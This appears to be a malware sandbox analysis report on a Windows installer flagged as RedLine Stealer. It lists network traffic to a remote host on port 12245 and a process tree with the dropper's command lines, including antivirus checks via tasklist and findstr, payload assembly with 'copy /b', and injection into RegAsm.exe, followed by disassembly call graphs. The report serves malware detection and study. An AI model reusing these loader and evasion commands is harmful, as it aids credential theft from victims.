                        Jul 26, 2024 21:22:16.664649010 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.664665937 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.668751001 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.668802977 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.668802977 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.668812037 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.668843985 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.668860912 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.669373035 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669384003 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669430971 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.669564009 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669573069 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669612885 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669612885 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.669620991 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669629097 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669646978 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.669653893 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.669665098 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.669692039 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670120001 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670130968 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670171976 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670397997 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670407057 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670414925 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670423985 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670439959 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670445919 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670466900 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670476913 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670480967 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670485973 CEST122454973745.140.147.183192.168.2.4
                        Jul 26, 2024 21:22:16.670500040 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670526981 CEST4973712245192.168.2.445.140.147.183
                        Jul 26, 2024 21:22:16.670561075 CEST122454973745.140.147.183192.168.2.4
                        UDP packets
                        Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                        Jul 26, 2024 21:21:05.251523972 CEST   51764        53         192.168.2.4  1.1.1.1
                        Jul 26, 2024 21:21:05.261353970 CEST   53           51764      1.1.1.1      192.168.2.4
                        DNS queries
                        Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                           Type            Class        DNS over HTTPS
                        Jul 26, 2024 21:21:05.251523972 CEST   192.168.2.4  1.1.1.1  0x3b      Standard query (0)  WTYoyXMgGLmyIq.WTYoyXMgGLmyIq  A (IP address)  IN (0x0001)  false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jul 26, 2024 21:21:05.261353970 CEST1.1.1.1192.168.2.40x3bName error (3)WTYoyXMgGLmyIq.WTYoyXMgGLmyIqnonenoneA (IP address)IN (0x0001)false


                        Target ID:0
                        Start time:15:20:56
                        Start date:26/07/2024
                        Path:C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                        Imagebase:0x400000
                        File size:4'303'615 bytes
                        MD5 hash:37BDC150AF529C0F560F1269DEE8FA17
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:15:20:57
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe"
                        Imagebase:0x400000
                        File size:3'117'568 bytes
                        MD5 hash:6CE04FD06C6A2CADE4A53F1521743144
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:15:20:58
                        Start date:26/07/2024
                        Path:C:\Program Files (x86)\StrLocalGate\Setup.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\StrLocalGate\Setup.exe"
                        Imagebase:0x400000
                        File size:1'750'211 bytes
                        MD5 hash:1C83CFBC97F7BC13E849E9E1AF8E7DA7
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:15:20:59
                        Start date:26/07/2024
                        Path:C:\StrLocalGate\MmReveals.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\StrLocalGate\MmReveals.exe"
                        Imagebase:0x400000
                        File size:975'909 bytes
                        MD5 hash:5223A85FF161E8818F0E514048051E7D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:15:20:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe"
                        Imagebase:0x400000
                        File size:3'251'712 bytes
                        MD5 hash:85FE6257CAB9D61BA8C481C64D0026BD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:5
                        Start time:15:21:01
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:15:21:01
                        Start date:26/07/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0xee0000
                        File size:79'360 bytes
                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:8
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /I "wrsa.exe opssvc.exe"
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\tasklist.exe
                        Wow64 process (32bit):true
                        Commandline:tasklist
                        Imagebase:0x7ff7699e0000
                        File size:79'360 bytes
                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:10
                        Start time:15:21:02
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        Target ID:11
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c md 154571
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:12
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\findstr.exe
                        Wow64 process (32bit):true
                        Commandline:findstr /V "TRUEANALOGMINDOC" Pepper
                        Imagebase:0x500000
                        File size:29'696 bytes
                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:13
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd /c copy /b Lt + Blake + Tranny + Category 154571\i
                        Imagebase:0x240000
                        File size:236'544 bytes
                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:14
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\Eco.pif
                        Wow64 process (32bit):true
                        Commandline:154571\Eco.pif 154571\i
                        Imagebase:0x510000
                        File size:937'776 bytes
                        MD5 hash:B06E67F9767E5023892D9698703AD098
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259828700.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266853177.0000000003F2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2316981318.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260248187.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266944790.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259567795.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260441214.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260351843.0000000004EDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2266772468.0000000003EA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2317320057.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260198982.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260600980.0000000004821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2257336074.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259618326.000000000486B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259650438.000000000497F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2260600980.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000E.00000003.2259764346.00000000048DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:15
                        Start time:15:21:03
                        Start date:26/07/2024
                        Path:C:\Windows\SysWOW64\timeout.exe
                        Wow64 process (32bit):true
                        Commandline:timeout 5
                        Imagebase:0xd90000
                        File size:25'088 bytes
                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        Target ID:19
                        Start time:15:21:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Imagebase:0x40000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        Target ID:20
                        Start time:15:21:59
                        Start date:26/07/2024
                        Path:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe
                        Imagebase:0x310000
                        File size:65'440 bytes
                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2568169273.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Has exited:true


                          Execution Graph

                          Execution Coverage:12.9%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:20.6%
                          Total number of Nodes:1523
                          Total number of Limit Nodes:37
GlobalFree 4763->4769 4763->4774 4764->4763 4770 404add 4765->4770 4766 404f1c 4766->4756 4775 404f31 ShowWindow GetDlgItem ShowWindow 4766->4775 4771 404d46 4767->4771 4769->4774 4773 404baa GetWindowLongW SetWindowLongW 4770->4773 4782 404ba4 4770->4782 4785 404b39 SendMessageW 4770->4785 4786 404b67 SendMessageW 4770->4786 4787 404b7b SendMessageW 4770->4787 4781 404d57 SendMessageW 4771->4781 4772->4748 4772->4757 4776 404bc4 4773->4776 4774->4766 4777 404de4 4774->4777 4780 40141d 80 API calls 4774->4780 4775->4756 4778 404be2 4776->4778 4779 404bca ShowWindow 4776->4779 4790 404e12 SendMessageW 4777->4790 4793 404e28 4777->4793 4795 403d98 SendMessageW 4778->4795 4794 403d98 SendMessageW 4779->4794 4780->4777 4781->4751 4782->4773 4782->4776 4785->4770 4786->4770 4787->4770 4788 404ef3 InvalidateRect 4788->4766 4789 404f09 4788->4789 4796 4043ad 4789->4796 4790->4793 4792 404ea1 SendMessageW SendMessageW 4792->4793 4793->4788 4793->4792 4794->4756 4795->4749 4797 4043cd 4796->4797 4798 406805 18 API calls 4797->4798 4799 40440d 4798->4799 4800 406805 18 API calls 4799->4800 4801 404418 4800->4801 4802 406805 18 API calls 4801->4802 4803 404428 lstrlenW wsprintfW SetDlgItemTextW 4802->4803 4803->4766 4804 4026fc 4805 401ee4 4804->4805 4807 402708 4804->4807 4805->4804 4806 406805 18 API calls 4805->4806 4806->4805 4103 4019fd 4104 40145c 18 API calls 4103->4104 4105 401a04 4104->4105 4106 405e7f 2 API calls 4105->4106 4107 401a0b 4106->4107 4808 4022fd 4809 40145c 18 API calls 4808->4809 4810 402304 GetFileVersionInfoSizeW 4809->4810 4811 40232b GlobalAlloc 4810->4811 4815 4030e3 4810->4815 4812 40233f GetFileVersionInfoW 4811->4812 4811->4815 4813 402350 VerQueryValueW 4812->4813 4814 402381 GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW 
CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 
4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 
3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 
wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API 
